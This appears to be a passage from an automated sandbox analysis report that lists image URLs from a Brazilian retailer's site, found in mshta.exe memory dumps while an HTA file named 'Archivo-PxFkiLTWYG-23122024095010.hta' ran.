Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.png
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-enfeites-de-natal-e13cbf8
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/destaque-desk-1250x313px-Natal-f25ef34312d3.
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535727062.000000000530E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/destaque-mobile-648x324px-Natal-0044175eebbb
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-desk-1296x54-bd34177535b9.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-mobile-648x54-2362be2b92fb.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535690117.000000000533F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_mob-5885530f6181.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_mob-cf1beb995cdb.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.png
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.pngx
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_mob-f70de84933f3.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_desk-e41609a1df26.png
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535666530.0000000005302000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005301000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_mob-26a210faf78c.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.png
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.pngD
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.pngJ
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_mob-f565c14907fb.png
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548706573.0000000005281000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/1-banners_home_mob-campanhas-home-300x450-9e
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548706573.0000000005281000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-banners_home_mob-campanhas-home-300x450-5f
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_mob-dfc74d8af364.png
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548706573.0000000005281000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004481000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/3-banners_home_mob-campanhas-home-300x450-2a
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548706573.0000000005281000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/4-banners_home_mob-campanhas-home-300x450-79
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548706573.0000000005281000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004481000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/5-banners_home_mob-campanhas-home-300x450-86
